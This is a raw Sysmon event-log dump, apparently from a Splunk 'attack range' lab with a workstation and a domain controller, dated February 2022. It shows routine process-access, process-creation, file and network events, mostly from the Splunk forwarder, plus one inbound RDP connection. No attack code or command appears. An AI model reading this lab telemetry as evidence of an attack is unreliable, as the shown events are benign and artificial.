11:10:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220394Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220393Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.227{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220392Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.227{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-163B-6216-EB04-000000003902}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220391Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.227{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-163B-6216-EB04-000000003902}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220390Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:51.228{4F8D34B0-163B-6216-EB04-000000003902}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220405Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:52.556{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E7F143A2037EE6109AD35572D26DE45,SHA256=ABE4B04EA076966E15F7BDDB022F84F1B6A2A588A36668A3E81E6FBE4611546B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:52.446{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AF71AD9DDCD82E888A150185844BDF0,SHA256=56D25CE84142AE3A058CB06298035673D9CFA58DCB27EA5F9CFB39C2D52C3886,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220404Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:52.290{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=932F3A034086C6F8CBEE79A123EB923C,SHA256=E5F7EB4B0D45E95916A7098820F950F01CE8772CA3D6BF673F83B9AEA853B9FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220406Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:53.792{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43F0688CFD83DB975AE65CA7977E800D,SHA256=DE4D8EA2AD2AD7F8FF14E506F9470784997D1C23D17018653B4182EF263FA8E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:53.465{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F23ECDBDB50D3A25C2B4BCCA8663167F,SHA256=48E127BDE35886AD5DD0CEC0D46085701FE0B648B3325550EF1B95AE91CDDAC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220407Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:54.805{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E49DF63D741D5E3B4FDF943874034AB,SHA256=7FF66FB6798FF533B1E9B29B911031FAAFF7265C6806F733CE3CE57E4311E26E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:54.482{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3B8B6E9EE74968F092E620BB436AA8E,SHA256=D2369E2C007A76C5A8FB172CF5AB804B35B01D359105B308E28D127F30F1351A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:53.633{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49333-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:55.498{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE425BA143951E671E71A13F964AECCD,SHA256=F7F3B5616748D482951C4A34982969DEF48EE176F6773779EC165EE7B072F21A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220409Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:55.587{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFD15E941FE88A2EB5DF304FDF828DA4,SHA256=78059BBDB088400992E8CCB91579434DF28F03842950F8D73DA17B4EA38880EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220408Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:52.693{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51578-false10.0.1.12-8000- 23542300x8000000000000000296323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:56.514{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66A2969733E0EF48327F78D8A1F1D9B6,SHA256=7FF497286C5D6AE2379784097707CB8D312B455C66431060CF1E1AA66E4AA3FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220411Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:53.199{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse47.242.107.32-63724-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000220410Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:56.040{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=750EC3364ED6A26E88C8A35CD847071B,SHA256=958E31ADAE158556253B0CF1EF1715990F528D93A5BE2C44E71CDFA8BB0EE87D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:57.528{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06317E3A73A90A5C05F33E6F5C873055,SHA256=06AB33C1523696C530BB1567992FABD70FED3EEF1FB306EC605282AF8FDE8B10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220412Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:57.087{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85FD8D4CF8E216F5D029681D1C7CD736,SHA256=F30A4CBEDAAC68257F2EA3ABD9E3663FEBA09E0A7CA5370E916D028C14BE9241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:58.543{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=581843C8B9CB5A677EA788C1A0EB1EA7,SHA256=21EDB1BBE39CF5A7A3744F582FCF8698AC41AE81253434D8AC0F34D6C63B23DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220413Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:58.102{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1339FB281A1E5DFF19A7BFE9CA3CCF4E,SHA256=1CCA7D9F6381ED2EACEFAC7D8A2BE20EA621059A025808EBE16D0BCF917DBF59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:59.580{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D8C7914E74BAB79E6CFD6BEAF11F6A9,SHA256=4EB93509F2428107C202067D753D5A1330D76B2F23BFC37416DA90623F52148C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220414Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:59.118{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CC02E34C587A5DA3DCBC8945A5F1E36,SHA256=79400A5A2B311E30A946D2891F28809EC06D69FEC2442977F10F474164DB4713,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:00.595{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1389855E09872975D22EB86F88EC77E,SHA256=377367A3C0A0F96B0EB8184E5C63DB31D5B134A28690C6143948A181F9EFFEC8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220416Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:58.537{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51579-false10.0.1.12-8000- 23542300x8000000000000000220415Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:00.149{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=033B3FFB64C9A591FF8FF46B66797781,SHA256=F333CD3A9BA6D02CF4E1DFA97A9DF73C3ED7B007FFC4DAE02D26A0499E25B85C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:01.664{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DD18C6CAC643828D4858A57913163BD,SHA256=588A5B0AB1A7CE9BE8829535C757C6E3DB7C99F2F9A90F389DE1233EB7856781,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220417Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:01.180{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E81712903F2939E3D1C6562C56C309A7,SHA256=93D89F5C6DC90148A13CBE9497973D47AE664CACA687A3526D1394CF72A436DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:01.564{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1645-6216-F306-000000003802}4592C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:01.563{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:01.563{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:01.562{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:01.562{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:01.562{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1645-6216-F306-000000003802}4592C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:01.560{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1645-6216-F306-000000003802}4592C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:01.559{C8EA50B7-1645-6216-F306-000000003802}4592C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 